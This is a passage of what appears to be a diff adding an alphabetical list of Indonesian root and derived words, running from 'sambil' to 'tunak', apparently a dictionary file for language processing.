+sambil
+sambilan
+sambit
+sambung
+sambut
+sambutan
+sami
+sampah
+sampai
+sampainya
+sampang
+sampean
+sampel
+samper
+samping
+sampir
+sampiran
+sampo
+sampuk
+sampul
+sampur
+samseng
+samudra
+samun
+sana
+sanak
+sanda
+sandak
+sandal
+sandang
+sandar
+sandaran
+sandera
+sandi
+sanding
+sandiwara
+sandung
+sandungan
+sang
+sanga
+sangar
+sangat
+sangga
+sanggah
+sanggahan
+sanggam
+sanggan
+sanggang
+sanggar
+sanggep
+sanggit
+sanggul
+sanggup
+sanggurdi
+sangit
+sangka
+sangkaan
+sangkak
+sangkakala
+sangkal
+sangkala
+sangkalan
+sangkan
+sangkap
+sangkar
+sangkil
+sangkur
+sangkut
+sangkutan
+sangsai
+sangsang
+sangsi
+sangu
+sani
+sanjak
+sanjung
+sanjungan
+sanksi
+santai
+santap
+santapan
+santer
+santet
+santiaji
+santir
+santiran
+santun
+santunan
+santung
+sanubari
+sapa
+sapaan
+sapau
+sapersi
+sapi
+sapit
+sapta
+sapu
+saput
+saraf
+sarak
+saran
+sarana
+sarang
+sarap
+sarapan
+sarasehan
+sari
+saring
+saringan
+sarira
+sarit
+sarjana
+sartan
+saru
+sarung
+sasana
+sasap
+sasar
+sasaran
+sasmita
+sastra
+sastrawan
+satelit
+satir
+satire
+satiris
+satria
+satu
+satuan
+satunya
+saturnus
+satwa
+saudagar
+saudara
+sauh
+sauk
+saung
+saur
+sawah
+sawala
+sawan
+sawar
+sawer
+sawi
+saya
+sayang
+sayangan
+sayap
+sayat
+sayatan
+sayembara
+sayu
+sayup
+sayur
+seabad
+seadanya
+sealiran
+seangkatan
+seantero
+searah
+sebab
+sebadan
+sebagai
+sebagaimana
+sebagian
+sebaiknya
+sebal
+sebaliknya
+sebam
+sebanding
+sebangsa
+sebangun
+sebanjar
+sebanyak
+sebar
+sebaran
+sebaris
+sebat
+sebatan
+sebatang
+sebatas
+sebaya
+sebelah
+sebenarnya
+sebentar
+sebentuk
+seberkas
+sebetulnya
+sebilang
+sebilangan
+sebisa
+sebisanya
+sebit
+sebongkah
+sebrot
+sebu
+sebun
+sebut
+sebutan
+sebutir
+secabik
+secara
+secarik
+sececah
+secercah
+secolek
+secubit
+secuil
+secukupnya
+sedan
+sedang
+sedap
+sedapat
+sedarah
+sedari
+sedat
+sedekah
+sedekahan
+sedemikan
+sedeng
+sederajat
+sederet
+sederhana
+sedia
+sediaan
+sedianya
+sedih
+sedikit
+sedikitnya
+sedimen
+sedimentasi
+sedompol
+sedot
+sedotan
+sedu
+seduh
+sedunia
+seelok
+seenaknya
+segala
+segan
+segar
+segara
+segaris
+segeblok
+segeh
+segel
+segelintir
+segenap
+segendang
+segepok
+segera
+segerombol
+segi
+segitiga
+segmen
+segmental
+segmentasi
+segolongan
+segumpal
+sehabis
+sehaluan
+seharusnya
+sehat
+sehati
+seideologi
+seikat
+seikhwan
+seimbang
+seindah
+seirama
+seiras
+seiring
+seisi
+sejabat
+sejadinya
+sejagat
+sejahtera
+sejajar
+sejak
+sejalan
+sejamaknya
+sejambak
+sejarah
+sejarawan
+sejati
+sejawat
+sejelalat
+sejenis
+sejoli
+sejuk
+sejumlah
+sejumput
+sejurus
+seka
+sekadar
+sekadarnya
+sekali
+sekalian
+sekaligus
+sekalipun
+sekam
+sekancah
+sekandung
+sekap
+sekapan
+sekar
+sekarang
+sekarat
+sekat
+sekata
+sekatan
+sekaum
+sekawanan
+sekeadaan
+sekedudukan
+sekehendaknya
+sekejap
+sekelamin
+sekelap
+sekelas
+sekelebat
+sekeliling
+sekelompok
+sekeluarga
+sekelumit
+sekepal
+sekerat
+sekeropok
+sekerumun
+seketika
+seketurunan
+sekilas
+sekiranya
+sekitar
+sekoci
+sekolah
+sekon
+sekongkol
+sekop
+sekotes
+sekretariat
+sekretaris
+sekrup
+seks
+seksi
+seksolog
+sekstet
+seksual
+seksualitas
+sektarian
+sekte
+sektor
+sekuasanya
+sekubit
+sekudung
+sekufu
+sekujur
+sekuku
+sekular
+sekularitas
+sekunder
+sekuritas
+sekuriti
+sekutil
+sekutu
+sel
+sela
+selagi
+selak
+selaku
+selalu
+selam
+selama
+selamanya
+selamat
+selamatan
+selampai
+selang
+selangan
+selangkah
+selangkangan
+selangkup
+selanjutnya
+selap
+selaput
+selaras
+selari
+selasar
+selat
+selatan
+selayaknya
+selayang
+selebaran
+selekasnya
+seleksi
+seleksian
+selekta
+selektif
+selempang
+selendang
+selengkap
+selengkapnya
+selentik
+selentingan
+selepas
+selera
+selesa
+selesai
+selesma
+selevel
+seleweng
+selia
+selidik
+selilit
+selimpat
+selimut
+selinap
+seling
+selingan
+selingkuh
+selingkung
+selintas
+selip
+selir
+selisih
+selisik
+selit
+seliwer
+selokan
+selongsong
+selonjor
+selonjoran
+selop
+seloroh
+seluar
+selubung
+seluk
+selulosa
+selundup
+selundupan
+seluruh
+seluruhnya
+selusur
+semacam
+semai
+semaian
+semak
+semalam
+semalaman
+semalu
+semampai
+semampang
+semampu
+semampunya
+semang
+semangat
+semangka
+semaput
+semarai
+semarak
+semartabat
+semasa
+semasih
+semat
+semata
+sematan
+semau
+sembah
+sembahan
+sembahyang
+sembap
+sembarang
+sembarangan
+sembari
+sembelih
+sembelik
+sembilu
+sembiluan
+sembir
+sembiran
+semboyan
+sembrani
+sembrono
+sembuh
+sembul
+sembunyi
+sembur
+semburan
+semburat
+sememangnya
+semen
+semenanjung
+semenjak
+semenjana
+sementara
+semerbak
+semesta
+semestinya
+semi
+seminar
+semiologi
+semiotika
+semir
+semisal
+semoga
+semolek
+sempadan
+sempal
+sempalan
+sempat
+sempil
+sempit
+sempoyongan
+semprit
+sempritan
+semprong
+semprot
+semprotan
+sempurna
+semrawut
+semu
+semua
+semuanya
+semula
+semut
+semutan
+senak
+senam
+senandung
+senang
+senantiasa
+senapan
+senapas
+senapati
+senarai
+senasib
+senat
+senda
+sendal
+sendang
+sendat
+sendawa
+sendi
+sendiri
+sendirian
+sendok
+sendu
+senduk
+senewen
+seng
+sengaja
+sengal
+sengap
+sengat
+sengau
+senggak
+senggang
+senggol
+senggolan
+sengguk
+sengit
+sengketa
+sengsara
+seni
+seniman
+senior
+senioritas
+senja
+senjang
+senjata
+senonoh
+sensasi
+sensasional
+sensibel
+sensibilitas
+sensitif
+sensitivitas
+sensor
+sensus
+sentak
+senter
+sentil
+sentimen
+sentimental
+sentong
+sentosa
+sentral
+sentralisasi
+sentuh
+sentuhan
+sentuk
+senyampang
+senyap
+senyatanya
+senyum
+sepadan
+sepah
+sepaha
+sepaham
+sepak
+sepakan
+sepakat
+sepandir
+sepangsa
+sepanjang
+sepantar
+sepantasnya
+sepantun
+separa
+separas
+separasi
+separatisme
+separuh
+sepasang
+sepat
+sepata
+sepatu
+sepatutnya
+sepeda
+sepekan
+sepekerjaan
+sepele
+sepemagutan
+sependapat
+sependirian
+sepenggal
+sepenuh
+sepenuhnya
+seperanggu
+seperangkat
+seperdu
+seperdua
+seperempat
+seperingkat
+seperlunya
+seperseribu
+seperti
+sepertinya
+sepi
+sepikiran
+sepintas
+sepoi
+sepotong
+seprofesi
+septet
+septima
+sepuak
+sepuh
+sepuhan
+sepupu
+sepur
+seputar
+serabut
+serabutan
+seracik
+seragam
+serah
+serak
+serakah
+serakan
+seram
+serambi
+serambut
+serampak
+serampang
+serampangan
+serang
+serangan
+serangkai
+serani
+seranta
+serap
+serapah
+serapan
+serasi
+serat
+seraup
+serba
+serban
+serbat
+serbet
+serbu
+serbuan
+serbuk
+serdadu
+serdawa
+seremoni
+seremonial
+serempak
+serempet
+serengeh
+serentak
+serenteng
+serep
+seresam
+seret
+sergah
+sergap
+seri
+serial
+seribu
+serikat
+sering
+seringai
+serius
+serobot
+seroja
+serok
+serona
+serong
+seronok
+serpih
+serpihan
+serta
+sertaan
+sertifikat
+sertu
+seru
+seruak
+seruan
+seruas
+seruduk
+seruling
+serumpun
+serupa
+seruput
+serut
+serutan
+server
+servis
+sesaat
+sesak
+sesal
+sesalan
+sesampai
+sesangkak
+sesap
+sesapan
+sesat
+sesegera
+sesenggukan
+sesepuh
+sesetel
+sesi
+sesuai
+sesuatu
+sesudah
+sesuka
+sesuku
+sesungguhnya
+set
+setagen
+setahap
+setahu
+setakar
+setakat
+setala
+setan
+setandan
+setanggi
+setapak
+setara
+setaraf
+setel
+setelah
+setelan
+setem
+seteman
+setengah
+seteru
+seterusnya
+setia
+setiga
+setik
+setimbal
+setimbang
+setimpal
+setinggi
+setingkat
+setip
+setir
+setolok
+setopan
+setor
+setoran
+setrap
+setruk
+setrum
+setrup
+setubuh
+setuju
+setujuan
+seukur
+seumpama
+seumumnya
+seumur
+seuntai
+seusia
+seutas
+seutuhnya
+sewa
+sewajarnya
+sewaktu
+sewarna
+sewot
+sewu
+sia
+siaga
+sial
+sialan
+siang
+siap
+siapa
+siar
+siaran
+siasat
+sibak
+sibar
+sibuk
+sidang
+sidik
+sifar
+sifat
+sigap
+sigar
+sigi
+signifikan
+signifikansi
+signifikasi
+sih
+sihir
+sikap
+sikat
+sikejut
+siklon
+siklus
+siksa
+siksaan
+siku
+sikut
+sila
+silabel
+silabus
+silam
+silang
+silap
+silat
+silaturahmi
+silau
+silih
+silihan
+silinder
+silir
+silsilah
+siluet
+siluman
+simak
+simbar
+simbol
+simbolis
+simbolisme
+simetri
+simetris
+simile
+simpai
+simpan
+simpanan
+simpang
+simpati
+simpatik
+simpatisan
+simpel
+simpleks
+simplifikasi
+simplistis
+simposium
+simptom
+simpuh
+simpuk
+simpul
+simpulan
+simulasi
+simultan
+sinambung
+sinar
+sinaran
+sindikasi
+sindikat
+sindir
+sindiran
+sinema
+sinetron
+singa
+singgah
+singgasana
+singgung
+singkap
+singkat
+singkatan
+singkir
+singkong
+singlet
+singset
+singsing
+singular
+singularitas
+sinis
+sinkron
+sinkronisasi
+sinonim
+sinopsis
+sinoptik
+sinse
+sintaksis
+sintesis
+sintetis
+sinting
+sinus
+sinyal
+sinyalemen
+sinyalir
+sip
+sipil
+sipir
+sipu
+siput
+sir
+sira
+sirah
+siram
+siraman
+siran
+sirap
+sirep
+sirih
+sirik
+siring
+sirip
+sirkam
+sirkuit
+sirkulasi
+sirna
+sirop
+sirsak
+sisa
+sisi
+sisih
+sisipan
+sisir
+sistem
+sistematika
+sistematis
+sistematisasi
+sistemis
+siswa
+sita
+sitaan
+sitir
+situ
+situasi
+situs
+siul
+siuman
+siur
+sivilisasi
+skak
+skala
+skandal
+skedul
+skema
+skematis
+skenario
+skeptis
+sketsa
+ski
+skop
+skor
+skorpio
+skors
+skrip
+skuadron
+skuat
+skuter
+slang
+slebor
+slip
+slof
+slogan
+soak
+soal
+sobat
+sobek
+sobekan
+soda
+sodium
+sodok
+sodor
+sofa
+sogok
+sogokan
+sohib
+sohor
+sok
+sokong
+sokongan
+sol
+solar
+solid
+solidaritas
+solider
+soliter
+solo
+solusi
+somasi
+sombong
+somplak
+songkok
+songong
+songsong
+sontak
+sopan
+sopir
+sorai
+sorak
+sore
+sori
+sorong
+sorongan
+sorot
+sorotan
+sortir
+sortiran
+sosial
+sosialisasi
+sosiolog
+sosiologi
+sosiopat
+sosok
+sosor
+spanduk
+spaning
+sparing
+spatula
+spedometer
+spektakel
+spektakuler
+spektator
+spektogram
+spektrum
+spekulan
+spekulasi
+spekulatif
+sperma
+spermatozoa
+spermatozoid
+spesial
+spesialis
+spesialisasi
+spesies
+spesifik
+spesifikasi
+spesimen
+spion
+spiral
+spirit
+spiritual
+spiritualisasi
+spons
+sponsor
+spontan
+spontanitas
+sporadis
+sport
+sportif
+sportivitas
+sreg
+sripanggung
+stabil
+stabilisasi
+stabilitas
+stadion
+stadium
+staf
+stagnan
+stagnasi
+stalaktit
+stambul
+stamina
+stan
+standar
+standardisasi
+stanza
+start
+starter
+stasioner
+stasiun
+statis
+statistik
+status
+stempel
+stenografi
+stepa
+stereotipe
+steril
+sterilisasi
+sterilitas
+stigma
+stiker
+stimulan
+stimulasi
+stimulus
+stok
+stop
+strap
+strata
+strategi
+strategis
+stratifikasi
+stres
+strip
+struktur
+struktural
+strukturalisasi
+studi
+studio
+suai
+suaka
+suam
+suami
+suap
+suapan
+suar
+suara
+suargaloka
+suasana
+suatu
+subang
+subbab
+subbagian
+subjek
+subjektif
+sublim
+subordinat
+subsidi
+subskrip
+substansi
+substansial
+substantif
+substil
+substitusi
+subuh
+subur
+subversi
+subversif
+suci
+sudah
+sudahnya
+sudi
+sudut
+sufi
+sufiks
+sugesti
+sugestif
+sugih
+suguh
+suguhan
+suhu
+suit
+sujud
+suka
+sukaan
+sukacita
+sukar
+sukarela
+sukarelawan
+sukaria
+sukat
+sukatan
+sukma
+sukrosa
+sukses
+suksesi
+suksesif
+suku
+sulam
+sulap
+sulfur
+sulih
+suling
+sulit
+sultan
+sultanat
+suluh
+suluk
+sulung
+sulut
+sumbal
+sumbang
+sumbangan
+sumbangsih
+sumbar
+sumbat
+sumber
+sumbing
+sumbu
+sumpah
+sumpal
+sumpek
+sumpit
+sumringah
+sumsum
+sumur
+sun
+sunah
+sunat
+sunbulat
+sundul
+sundulan
+sundut
+sungai
+sunggi
+sungging
+sungguh
+sungguhan
+sungguhpun
+sungkal
+sungkan
+sungkap
+sungkem
+sungkit
+sungkup
+sungkur
+sungsang
+sungu
+sungut
+suni
+suntik
+suntikan
+sunting
+suntuk
+sunyi
+supaya
+supel
+super
+superior
+superioritas
+supernatural
+superskrip
+supersonik
+superstar
+supervisi
+supervisor
+suplai
+suplemen
+suporter
+suportif
+supranatural
+supremasi
+supresi
+surai
+suram
+surat
+suratan
+surau
+surga
+surgawi
+suri
+surih
+surplus
+suruh
+suruhan
+suruk
+surup
+surut
+survei
+surya
+suryakanta
+susah
+susila
+suspensi
+suster
+susu
+susuh
+susuk
+susul
+susulan
+susun
+susunan
+susup
+susur
+susut
+suvenir
+suwir
+swaagih
+swadidik
+swapraja
+swasembada
+swasta
+swastanisasi
+swatantra
+swipoa
+syah
+syahadat
+syahbandar
+syahda
+syahdu
+syahid
+syahwat
+syair
+syak
+syal
+syamsu
+syarah
+syarahan
+syarat
+syariat
+syiar
+syirik
+syiwa
+syok
+syukur
+syur
+syura
+taat
+tabah
+tabel
+tabiat
+tabib
+tabik
+tabir
+tablet
+tabok
+tabokan
+tabrak
+tabrakan
+tabu
+tabuh
+tabuhan
+tabunan
+tabung
+tabungan
+tabur
+taburan
+tadah
+tadbir
+tadinya
+tadir
+tafahus
+tafakur
+tafsir
+tafsiran
+tagak
+tagan
+tagar
+tagih
+tagihan
+tagut
+tahak
+tahan
+tahanan
+tahang
+tahap
+tahapan
+tahi
+tahir
+tahkik
+tahu
+tahun
+taikat
+taiko
+tajak
+tajam
+tajdid
+taji
+tajin
+tajuk
+tak
+takabur
+takal
+takar
+takaran
+takasir
+takat
+takdir
+takdirnya
+takdis
+takhayul
+takhta
+taki
+takik
+takir
+takjub
+taklimat
+takluk
+taklukan
+takraw
+takrif
+takrim
+taksa
+taksir
+taksiran
+taksuka
+taktik
+taktis
+takuk
+takut
+takwa
+takzim
+tala
+talah
+talak
+talam
+talas
+talempong
+talenta
+tali
+talu
+tamadun
+tamah
+tamak
+tamam
+taman
+tamarinda
+tamasya
+tamat
+tamatan
+tambah
+tambahan
+tambak
+tambal
+tambalan
+tambang
+tambatan
+tambeng
+tambun
+tambunan
+tambur
+tameng
+tampah
+tampak
+tampaknya
+tampal
+tampan
+tampang
+tampar
+tamparan
+tampek
+tampikan
+tampil
+tampilan
+tampuk
+tampung
+tamsil
+tamtama
+tamu
+tanah
+tanak
+tanam
+tanaman
+tanau
+tancang
+tancap
+tanda
+tandan
+tandang
+tandas
+tandingan
+tandon
+tandu
+tanduk
+tandus
+tang
+tangan
+tangar
+tangga
+tanggal
+tanggang
+tanggap
+tanggapan
+tangguh
+tanggul
+tanggulang
+tanggung
+tanggungan
+tangis
+tangisan
+tangkai
+tangkal
+tangkapan
+tangkas
+tangki
+tangkil
+tangkis
+tangkisan
+tangkup
+tangkur
+tanglung
+tangsi
+tanjak
+tanjung
+tanpa
+tante
+tanur
+tanwujud
+tanya
+tapa
+tapak
+tapal
+tapang
+tapir
+tapis
+tapisan
+taplak
+tapuk
+tapus
+tara
+taraf
+tarak
+tarbil
+tarbus
+tarekat
+target
+tari
+tarian
+tarif
+tarik
+tarikan
+tarikh
+taring
+taris
+tartar
+taruh
+taruhan
+taruk
+taruna
+tarung
+tarup
+tas
+tasamuh
+tasawuf
+tasbih
+tasdik
+tasik
+taswir
+tasyalim
+tasyrih
+tata
+tataan
+tatah
+tatakan
+tatal
+tatanan
+tatap
+tatapan
+tatar
+tatkala
+tato
+tauke
+tauliah
+tauran
+taurus
+tautan
+tautologi
+tautologis
+tawa
+tawaduk
+tawakal
+tawan
+tawanan
+tawar
+tawaran
+tawon
+tawuran
+tayang
+tayangan
+teater
+teatris
+tebah
+tebak
+tebakan
+tebal
+tebang
+tebaran
+tebas
+tebat
+tebeng
+tebing
+tebok
+tebuk
+tebus
+tebusan
+tecerna
+tedas
+tedeng
+teduh
+tega
+tegah
+tegahan
+tegak
+tegang
+tegangan
+tegap
+tegar
+tegas
+tegel
+teguh
+teguk
+tegukan
+tegun
+tegur
+teguran
+teh
+teja
+tekad
+tekak
+tekan
+tekanan
+tekek
+tekel
+teken
+tekenan
+teki
+teknik
+teko
+tekor
+teks
+tekstil
+tekstur
+tekukur
+tekun
+tela
+telaah
+teladan
+teladas
+telaga
+telah
+telahan
+telak
+telan
+telang
+telangkup
+telanjang
+telanjur
+telantar
+telapak
+telas
+telat
+telatah
+telaten
+tele
+teledor
+telegram
+telekung
+telentang
+telepon
+teler
+telik
+telikung
+telinga
+teliti
+telor
+teluh
+telungkup
+telur
+telus
+telusur
+telut
+tem
+tema
+temaha
+teman
+temaram
+temayun
+tembak
+tembakau
+tembam
+tembang
+tembelang
+temberang
+tembereng
+tembiang
+tembikar
+tembis
+tembok
+tembolok
+tembuk
+tembung
+tembuni
+tembus
+tembusan
+tempaan
+tempah
+tempan
+tempat
+tempatan
+tempayak
+tempayan
+tempel
+tempelak
+tempelan
+tempeleng
+tempelengan
+temperamen
+temperamental
+temperas
+temperatur
+temperau
+tempiar
+tempias
+tempik
+templok
+tempo
+tempoh
+tempong
+temporer
+tempuh
+tempurung
+temu
+tenaga
+tenang
+tenar
+tenat
+tenda
+tendang
+tendangan
+tendensi
+tendensius
+tengadah
+tengah
+tengak
+tengara
+tenggak
+tenggala
+tenggang
+tenggangan
+tenggat
+tenggek
+tenggelam
+tengger
+tenggorok
+tengik
+tengil
+tengkarap
+tengkel
+tengking
+tengkingan
+tengkorak
+tengkuluk
+tengkurap
+tengok
+tenok
+tensi
+tentamen
+tentang
+tentangan
+tentara
+tentatif
+tenteng
+tenteram
+tentu
+tenun
+tenunan
+tenung
+teologi
+teoretikus
+teoretis
+teori
+tepak
+tepakan
+tepas
+tepat
+teperdaya
+tepergok
+tepi
+tepian
+tepik
+tepis
+teplok
+tepok
+tepos
+tepuk
+tepukan
+tepung
+ter
+tera
+teraan
+terabadikan
+terabaikan
+terabas
+teradat
+teraduk
+teragak
+teragendakan
+teraju
+terak
+terakhir
+terakota
+terakumulasi
+teral
+terala
+terali
+terambang
+terambau
+terampai
+terampil
+teramung
+teran
+terancam
+terancang
+terang
+terangan
+terangkat
+teraniaya
+terantuk
+terap
+terapi
+terarah
+teras
+terasi
+terasing
+teratai
+teratak
+teratas
+teratasi
+teratur
+terawang
+terbabit
+terbadai
+terbagi
+terbaik
+terbakar
+terbalik
+terban
+terbancut
+terbang
+terbangun
+terbantah
+terbantu
+terbanyak
+terbaring
+terbatas
+terbaur
+terbayang
+terbebang
+terbedol
+terbelah
+terbelakang
+terbelenggu
+terbeliak
+terbelit
+terbenam
+terbendung
+terbengkalai
+terbentang
+terbentur
+terberkas
+terbersit
+terbeset
+terbetik
+terbias
+terbilang
+terbina
+terbis
+terbit
+terbitan
+terbius
+terbongkar
+terbuai
+terbuang
+terbujuk
+terbujur
+terbuka
+terbukti
+terburai
+tercabut
+tercacak
+tercacat
+tercaduk
+tercagak
+tercalar
+tercampak
+tercampur
+tercancang
+tercangkel
+tercantel
+tercantol
+tercantum
+tercap
+tercapai
+tercapak
+tercapit
+tercatat
+tercebur
+tercecer
+tercekik
+tercekluk
+tercela
+tercemar
+tercemplung
+tercengang
+tercengung
+tercengut
+tercenung
+tercerai
+tercermin
+tercingangah
+tercinta
+tercirit
+terconteng
+tercoret
+tercucuk
+tercundang
+tercungap
+tercurah
+tercurahkan
+terdaftar
+terdahulu
+terdakwa
+terdampar
+terdapat
+terdayuh
+terdedah
+terdekap
+terdekat
+terdengar
+terdepak
+terdepan
+terdesak
+terdiam
+terdidik
+terdinding
+terdokumentasikan
+terdongak
+terdorong
+terduduk
+terduga
+terekspos
+tereliminasi
+terempang
+terendah
+terendam
+terendong
+terenggang
+terentang
+tergabung
+tergambar
+terganggu
+terganjal
+tergantung
+tergarap
+tergegau
+tergeletak
+tergeliat
+tergelimpang
+tergelincir
+tergelitik
+tergeluncur
+tergenang
+tergencet
+tergerai
+tergiring
+tergiur
+tergoda
+tergolong
+tergores
+tergugah
+terguling
+tergulir
+tergulung
+terguncang
+tergurat
+tergusur
+terguyur
+terhad
+terhalang
+terhambat
+terhampar
+terhantar
+terhapus
+terhasut
+terhempas
+terhenti
+terhibur
+terhidang
+terhimpun
+terhindar
+terhingga
+terhipnosis
+terhirup
+terhisab
+terhisap
+terhitung
+terhormat
+terhukum
+terhunjam
+terhunus
+teriak
+teriakan
+terik
+terikat
+terima
+terimpit
+terinfeksi
+teringat
+terinjak
+terintang
+terintegrasi
+teriris
+terisolasi
+teristimewa
+teritori
+teritorial
+terjadi
+terjadwal
+terjaga
+terjajar
+terjal
+terjalin
+terjamin
+terjang
+terjangan
+terjangkau
+terjangkit
+terjantur
+terjaring
+terjatuh
+terjebak
+terjeblos
+terjelabak
+terjelak
+terjelapak
+terjemah
+terjemahan
+terjengkang
+terjepit
+terjerahak
+terjerat
+terjerembap
+terjerumus
+terjerungkau
+terjila
+terjuju
+terjumpa
+terjun
+terjunam
+terjungkir
+terka
+terkaan
+terkait
+terkam
+terkaman
+terkampai
+terkancah
+terkancing
+terkandung
+terkangkang
+terkap
+terkapar
+terkatakan
+terkatup
+terkawal
+terkebat
+terkecoh
+terkedip
+terkejar
+terkejut
+terkekang
+terkelempai
+terkelepai
+terkelolong
+terkeloyak
+terkelu
+terkelupas
+terkemudian
+terkemuka
+terkena
+terkenai
+terkenal
+terkenang
+terkendali
+terkepung
+terkesiap
+terkesima
+terketuk
+terkikis
+terkilas
+terkilir
+terkinjat
+terkirakan
+terkiuk
+terkocok
+terkonsentrasi
+terkonsolidasi
+terkontaminasi
+terkoyak
+terkuak
+terkubur
+terkucil
+terkulai
+terkunci
+terkungkung
+terkupas
+terkurung
+terkutuk
+terlaksana
+terlalai
+terlalaikan
+terlalu
+terlalui
+terlambat
+terlampau
+terlampaui
+terlampiaskan
+terlampir
+terlangah
+terlanggar
+terlanjur
+terlantas
+terlarang
+terlatih
+terlayang
+terlebih
+terlena
+terlengah
+terlepas
+terletak
+terlewat
+terlewati
+terlibat
+terlihat
+terlilit
+terlindung
+terlintas
+terlintasi
+terlipat
+terliput
+terlompati
+terlonggok
+terlontar
+terluang
+terlucut
+terluka
+terlukis
+terlupa
+terlupakan
+term
+termakan
+termakbul
+termaktub
+termala
+termandam
+termangu
+termasuk
+termasyhur
+termazkur
+termengkelan
+termenung
+termin
+terminal
+terminasi
+terminologi
+termuat
+termuda
+termulia
+ternahak
+ternak
+ternama
+ternilai
+ternoda
+terobos
+terobosan
+teroka
+terompah
+teronggok
+teropong
+teror
+terorganisasi
+terowongan
+terpa
+terpaan
+terpadu
+terpajan
+terpajang
+terpaksa
+terpaku
+terpalit
+terpampang
+terpancang
+terpancing
+terpancur
+terpandang
+terpanggul
+terpantul
+terpasang
+terpasung
+terpatok
+terpatri
+terpaut
+terpecah
+terpecahkan
+terpegah
+terpejam
+terpejamkan
+terpelajar
+terpelanting
+terpelesat
+terpeleset
+terpelet
+terpeluk
+terpencet
+terpencil
+terpendam
+terpengap
+terpengaruh
+terpenggal
+terpenjara
+terpental
+terpentang
+terpenting
+terpenuhi
+terpepet
+terperangah
+terperangkap
+terperosok
+terpesona
+terpesong
+terpica
+terpidana
+terpikat
+terpikir
+terpikul
+terpilih
+terpilin
+terpimpin
+terpincut
+terpisah
+terpiuh
+terpojok
+terpotong
+terpuaskan
+terpuji
+terpukau
+terpukul
+terpulang
+terpumpun
+terpuruk
+terpusat
+terputus
+tersaji
+tersakat
+tersaku
+tersalurkan
+tersalut
+tersampir
+tersampuk
+tersandung
+tersanggat
+tersangka
+tersangkut
+tersapu
+tersaring
+tersaruk
+tersarung
+tersaur
+tersayat
+tersebar
+tersebut
+tersedak
+tersedia
+tersedot
+tersekap
+tersekat
+terselak
+terselam
+terselamatkan
+terselap
+terseleksi
+terselempang
+terselenggara
+terselesaikan
+terselimuti
+terselip
+terselit
+terselubung
+tersemat
+tersembul
+tersembunyi
+tersembur
+tersemu
+tersenak
+tersendat
+tersendiri
+tersenggol
+tersengsem
+tersentak
+tersentralisasi
+tersentuh
+tersenyum
+tersepak
+terserah
+terserak
+terserang
+terserap
+terserat
+terserempet
+terseret
+terseruduk
+tersesak
+tersesat
+tersetrum
+tersiar
+tersibak
+tersila
+tersimbur
+tersimpan
+tersimpul
+tersindir
+tersinggung
+tersingkap
+tersingkir
+tersirap
+tersirat
+tersirep
+tersisa
+tersisih
+tersisip
+tersohor
+terstruktur
+tersua
+tersudut
+tersuguh
+tersuling
+tersumbat
+tersungkur
+tersuntuk
+tersurat
+tersuruk
+tersusul
+tersusun
+tertabrak
+tertagih
+tertahan
+tertahankan
+tertambat
+tertampak
+tertanam
+tertancang
+tertancap
+tertangani
+tertangguh
+tertanggulangi
+tertanggung
+tertangkap
+tertangkup
+tertara
+tertarik
+tertarung
+tertata
+tertatal
+tertawa
+tertawan
+tertebar
+tertegak
+terteguk
+tertekan
+tertelan
+tertelentang
+tertelungkup
+tertempel
+tertendang
+tertentang
+tertentu
+tertenung
+tertera
+terterima
+tertib
+tertiban
+tertikam
+tertimbun
+tertimpa
+tertindas
+tertindih
+tertinggal
+tertinggi
+tertipu
+tertolong
+tertubruk
+tertuduh
+tertuju
+tertulang
+tertular
+tertulis
+tertumbuk
+tertumpuk
+tertunduk
+tertunggang
+tertunjang
+tertuntung
+tertusuk
+tertutup
+terucapkan
+teruit
+teruji
+teruk
+terukir
+terulur
+teruna
+terungkai
+terungkap
+terungku
+terup
+terurai
+terurus
+terus
+terusan
+terusik
+terusir
+terutama
+terwalak
+terwelu
+terwujud
+tes
+tesaurus
+tesis
+testimoni
+testis
+tetak
+tetangga
+tetap
+tetapan
+tetapi
+tetar
+tetas
+teteguk
+tetek
+tetes
+tetesan
+tetua
+tewas
+tiada
+tiang
+tiarap
+tiba
+tiban
+tidak
+tidur
+tiduran
+tik
+tikai
+tikam
+tikaman
+tikar
+tikas
+tiket
+tikung
+tikungan
+tilap
+tilikan
+tim
+timang
+timba
+timbal
+timbalan
+timbang
+timbangan
+timbel
+timbrung
+timbuk
+timbul
+timbun
+timbunan
+timpa
+timpal
+timpang
+timpas
+timpuh
+timpuk
+tindak
+tindakan
+tindas
+tindasan
+tindih
+tindik
+tinggal
+tinggalan
+tinggi
+tingginya
+tinggung
+tingkah
+tingkar
+tingkat
+tingkatan
+tingkuh
+tinimbang
+tinja
+tinjau
+tinjauan
+tinju
+tinta
+tinting
+tintingan
+tip
+tipar
+tipe
+tipikal
+tipis
+tipu
+tirai
+tirakat
+tiran
+tirani
+tiranis
+tiras
+tiris
+tiru
+tiruan
+tirus
+tisik
+titah
+titan
+titel
+titi
+titian
+titik
+titip
+titipan
+titir
+titis
+titisan
+tituler
+tiup
+tiupan
+tobak
+tobat
+toboh
+todong
+tohok
+tohor
+toilet
+tokak
+tokcer
+tokek
+toko
+tokoh
+tokok
+tol
+tolak
+tolakan
+tolan
+toleh
+toleran
+toleransi
+tolok
+tolol
+tolong
+tolongan
+tombok
+tombol
+tomong
+tonggak
+tonggok
+tonggong
+tongkah
+tongkat
+tongkrong
+tongkrongan
+tongol
+tongong
+tonil
+tonjok
+tonjol
+tonjolan
+tonton
+tontonan
+top
+topan
+topang
+topek
+topeng
+topi
+topik
+toreh
+tornado
+torso
+total
+totalitas
+totaliter
+totaliterisme
+totok
+totol
+toya
+toyor
+tradisi
+tradisional
+tragedi
+tragis
+trah
+traktir
+trans
+transaksi
+transenden
+transendental
+transfer
+transformasi
+transisi
+transkripsi
+transliterasi
+transmisi
+transmutasi
+transparan
+transparansi
+transplantasi
+transpor
+transportasi
+trauma
+traumatis
+travesti
+trayek
+trek
+tren
+trendi
+trengginas
+trenyuh
+tribune
+trik
+triwulan
+trofi
+trompet
+trotoar
+tua
+tuah
+tuai
+tuak
+tuala
+tualang
+tuan
+tuang
+tuangan
+tuarang
+tuas
+tuba
+tubi
+tubian
+tubir
+tubruk
+tubrukan
+tubuh
+tuding
+tudingan
+tuduh
+tuduhan
+tudung
+tugas
+tugu
+tujah
+tuju
+tujuan
+tukang
+tukar
+tukas
+tukik
+tukul
+tula
+tulah
+tulang
+tulen
+tuli
+tulis
+tulisan
+tulus
+tuma
+tuman
+tumang
+tumbal
+tumbang
+tumbuh
+tumbuhan
+tumbuk
+tumbukan
+tumenggung
+tumor
+tumpah
+tumpahan
+tumpak
+tumpang
+tumpangan
+tumpas
+tumpat
+tumpil
+tumplak
+tumpu
+tumpuan
+tumpuk
+tumpukan
+tumpul
+tumpur
+tumus
+tuna
+tunagrahita
+tunai
+tunak
